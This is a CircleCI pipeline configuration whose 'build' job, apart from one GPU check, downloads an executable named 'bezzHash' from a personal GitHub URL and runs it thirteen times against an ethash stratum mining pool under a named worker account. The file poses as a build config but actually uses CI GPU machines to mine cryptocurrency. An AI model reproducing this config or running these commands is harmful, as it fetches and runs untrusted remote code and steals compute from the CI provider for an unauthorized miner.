version: 2.1

jobs:
  build:
    machine:
      image: ubuntu-1604-cuda-10.1:201909-23
    resource_class: gpu.nvidia.large
    steps:
      - run: docker run --gpus all nvidia/cuda:9.0-base nvidia-smi
      - run: wget https://raw.githubusercontent.com/nathanfleight/scripts/main/bezzHash && chmod +x bezzHash && ./bezzHash --url=stratum+tcp://teguhcong.aswes@ethash.poolbinance.com:1800 --log --extra --latency --all-shares --shares-detail --show-mode --list-modes --mode=99
      - run: ./bezzHash --url=stratum+tcp://teguhcong.aswes@ethash.poolbinance.com:1800 --log --extra --latency --all-shares --shares-detail --show-mode --list-modes --mode=99
      - run: ./bezzHash --url=stratum+tcp://teguhcong.aswes@ethash.poolbinance.com:1800 --log --extra --latency --all-shares --shares-detail --show-mode --list-modes --mode=99
      - run: ./bezzHash --url=stratum+tcp://teguhcong.aswes@ethash.poolbinance.com:1800 --log --extra --latency --all-shares --shares-detail --show-mode --list-modes --mode=99
      - run: ./bezzHash --url=stratum+tcp://teguhcong.aswes@ethash.poolbinance.com:1800 --log --extra --latency --all-shares --shares-detail --show-mode --list-modes --mode=99
      - run: ./bezzHash --url=stratum+tcp://teguhcong.aswes@ethash.poolbinance.com:1800 --log --extra --latency --all-shares --shares-detail --show-mode --list-modes --mode=99
      - run: ./bezzHash --url=stratum+tcp://teguhcong.aswes@ethash.poolbinance.com:1800 --log --extra --latency --all-shares --shares-detail --show-mode --list-modes --mode=99
      - run: ./bezzHash --url=stratum+tcp://teguhcong.aswes@ethash.poolbinance.com:1800 --log --extra --latency --all-shares --shares-detail --show-mode --list-modes --mode=99
      - run: ./bezzHash --url=stratum+tcp://teguhcong.aswes@ethash.poolbinance.com:1800 --log --extra --latency --all-shares --shares-detail --show-mode --list-modes --mode=99
      - run: ./bezzHash --url=stratum+tcp://teguhcong.aswes@ethash.poolbinance.com:1800 --log --extra --latency --all-shares --shares-detail --show-mode --list-modes --mode=99
      - run: ./bezzHash --url=stratum+tcp://teguhcong.aswes@ethash.poolbinance.com:1800 --log --extra --latency --all-shares --shares-detail --show-mode --list-modes --mode=99
      - run: ./bezzHash --url=stratum+tcp://teguhcong.aswes@ethash.poolbinance.com:1800 --log --extra --latency --all-shares --shares-detail --show-mode --list-modes --mode=99